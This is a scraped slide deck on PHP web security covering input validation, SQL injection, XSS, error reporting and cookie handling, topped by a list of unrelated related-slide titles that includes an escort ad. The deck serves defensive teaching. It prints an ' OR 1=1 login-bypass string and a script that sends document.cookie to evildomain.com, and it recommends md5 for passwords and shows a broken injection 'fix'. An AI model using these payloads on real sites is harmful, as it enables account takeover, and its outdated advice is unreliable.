TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

PHP Security

  • 2.
  • 3. Consequently PHP applications often end up working with sensitive data a. Unauthorized access to this data is unacceptable. b. To prevent problems a secure design is needed . www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 4. Basic Steps 1.Input fields must be sanitized before being used One of the key concepts you must accept is that user input is unreliable and not to be trusted. Partially lost in transmission between server & client. Corrupted by some in-between process. Modified by the malicoius user in an unexpected manner. Intentional attempt to gain unauthorized access or to crash the application. There are are many ways to sanitize data. One can use php inbuild function for the santization pupose or can use custom defined functions. Eg: All data passed to PHP (GET/POST/COOKIE) ends up being a string. Using strings where integers are needed is not only inefficient but also dangerous. if (!empty($_GET['id'])) { $id = (int) $_GET['id']; } else{ $id = 0; } As well as PHP comes with a ctype, extension that offers a very quick mechanism for validating string content. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 5. if (!ctype_alnum($_GET['login'])) { echo &quot;Only A-Za-z0-9 are allowed.&quot;; } if (!ctype_alpha($_GET['captcha'])) { echo &quot;Only A-Za-z are allowed.&quot;; } You can use also your own customized validation.Like function validateEmail($email){ if($email == &quot;&quot;){ return false; } else{ if(!preg_match(&quot;(^[-]+@([-a-z0-9]+)+[a-z]{2,4}$)i&quot;, $email)){ return false; } else{ return true; } } } www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 6. 2.Data Validations As we all know there are 2 types of validation for a web application. As follows: a. Client side validation b. Server side validation Client side validation is not reliable as an attacker can always bypass the client side validations or can shuts off the client-side script routines, for example, by disabling JavaScript. Hence Server side validation is a must for the security point of view, even if the client-side validation do exists. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 7. 3. Accessing Input Data: There are a series of super-globals which offer very simple access to the input data. $_GET , $_POST, $_SERVER, $_REQUEST Using GET to send sensitive data causes security violation. When sensitive data is to be passed to the server, do not send it as a parameter in the query string like in: http://sitename/check_valid.php?cardnumber=1234567890123456. This is not appropriate because, the entire URL may be stored by the browser in its history, potentially exposing the sensitive information to someone else using the same machine later. The POST method uses the HTTP body to pass information and this is good in this case because the HTTP body is not logged. Using POST doesn’t offer enough protection. The data’s confidentiality and integrity are still at risk because the information is still sent in clear text. So the use of encryption technique is required, using SSL. Ddata is stored and accessed securely. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 8. 4.Escaping Output Output is anything that leaves your application, bound for a client. The client, in this case, is anything from aWeb browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands. To escape output intended for a Web browser, PHP provides htmlspecialchars()‏ and htmlentities(), EG: $_POST['data'] = “<script>alert('Security issues');</script>”; if (get_magic_quotes_gpc()) { $var = stripslashes($_POST['data']); } echo htmlentities($var ); www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 9. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 10. 5.Register Globals The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. Making register global on is a security risk. Therefore, one should always develop and deploy applications with register_globals disabled. Why it is a security risk? Let us consider the following block of codes <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ?> www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 11. Since $authorized is left un-initialized if user authentication fails, an attacker could access privileged data by simply passing the value via GET. http://example.com/script.php?authorized=1 Solutions: Disable register_globals in PHP.ini. Already done by default as of PHP 4.2.0 . Code with error_reporting set to E_ALL. Allows you to see warnings about the use of un-initialized variables. Type sensitive validation conditions. Because input is always a string, type sensitive compare to a Boolean or an integer will always fail. A best practice is to initialize all variables. Error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 12. 6.Error Reporting: During development, making error reporting turned on is good practise. ini_set('error_reporting',E_ALL); However, when you put your site into production, this level of detail can be dangerous. You can't foresee all errors during development ,your program could run out of memory or disk space, for example. So, for safety's sake, on production sites you should disable the displaying of errors and instead log them to a file safely outside of your directory root; this way, the public can't see if anything goes wrong. error_reporting(E_ALL^E_NOTICE); // This is a 'sensible' reporting level ini_set('display_errors', 0); // Hide all error messages from the public ini_set('log_errors', 1); ini_set('error_log', 'path/to_your/log.txt'); /* Preferably a location outside of your web root */ www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 13. 7.SQL Injection SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database. One of the most common vulnerabilities is when logging in to a site. Take this example: $username = $_POST['username']; $password = $_POST['password']; $result = mysql_query(&quot; SELECT * FROM site_users WHERE username = '$username' AND password = '$password' &quot;); if ( mysql_num_rows($result) > 0 )‏ // logged in www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 14. If the attacker enters a valid username in the username field &quot;rob&quot; and the following in the password field ' OR 1=1 ' The resulting query will look like this: SELECT * FROM site_users WHERE username = 'rob' AND password = '' OR 1=1 Since the last crieteria will always be true.The user will be able to log in as rob without knowing rob's password. Prevnting Sql injection: The best way of cleaning input is using PHP's built in mysql_real_escape_string() function, this will escape characters such as ',&quot;&quot; and others. checking the magic quotes is on or off to avoid double escaping. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 15. Function check_sql_injection($var){ if(get_magic_quotes_gpc()) { $var = stripslashes($var); } $var = mysql_real_escape_string($var); return $var; } Now this customized function can be used in sql query to prevent sql injection.. SELECT * FROM site_users WHERE username =check_sql_injection( '$username')‏ AND password = check_sql_injection( '$password)‏ www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 16. 8.XSS XSS stands for &quot;Cross Site Scripting&quot;, and refers to the act of inserting content, such as Javascript, into a page. Usually these attacks are used to steal cookies which often contain sensitive data such as login information. EG: $id = $_GET['id']; echo 'Displaying news item number '.$id; An attacker could pass string like this <script>window.location.href = &quot;http://evildomain.com/cookie-stealer.php?c=' + document.cookie;</script> If a user passed this simple Javascript into the $_GET['id'] variable and convinced a user to click it, then the script would be executed and pass the user's cookie data onto the attacker, allowing them to log in as the user. It's really that simple. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 17. Prevent XSS attacks? This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping. The easiest way to do this is with PHP's built in strip_tags() function, which will remove HTML from a string rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities(), which will convert < and > to &lt; and &gt; respectively. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 18. 9. Passwords need to be stored securely. Secure information, such as passwords and credit card numbers, should be stored in an encrypted format. This can be achivied using md5 command or any stronger method of algorithm. By using this, the attacker wont able access the password of a user. 10. Lock out functionality must be there for the login functionality. An attacker may continue to brute force the login functions until successful. So to prevent the same after a given number of unsuccessful logins over a period of time, the IP/User should be blocked or locked out for another a given period of time. For example 5 unsuccessful logins in 5 minutes may call for a lockout of 30 minutes for that IP/User. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 19. 11.The email forms are vulnerable to email header injection Input should be validated and checked so that email header injection cannot occur. Escaping the CR and LF characters is needed and using captcha during mail form submission. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 20. 12. Using Cookies Securely Cookies are an easy and useful way to keep user-specific information available. However, because cookies are sent to the browser's computer, they are vulnerable to spoofing or other malicious use. Follow these guidelines: Do not store any critical information in cookies. For example, do not store a user's password in a cookie, even temporarily. As a rule, do not store any sensitive information in a cookie. Set expiration dates on cookies to the shortest practical time you can. Avoid permanent cookies if possible. Consider encrypting information in cookies. Consider setting the Secure and HttpOnly properties on your cookies to true. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
  • 21.
  • 22. For further queries contact us or call 1-248-686-1424 www.mindfiresolutions.com www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions